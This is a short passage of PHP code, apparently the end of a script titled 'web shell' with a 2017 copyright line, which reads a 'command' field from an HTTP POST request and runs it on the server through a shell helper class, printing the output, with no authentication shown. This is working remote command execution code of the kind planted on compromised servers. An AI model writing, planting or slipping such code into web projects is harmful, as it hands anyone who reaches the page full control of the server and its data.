*/ $command = isset($_POST['command']) ? strval($_POST['command']) : ""; if ($command !== "") { require 'shell.class.php'; echo shell::command($command, "echo pwd", true); exit; } ?> web shell


CopyRight © 2017- xiaoqidun@gmail.com All Rights Reserved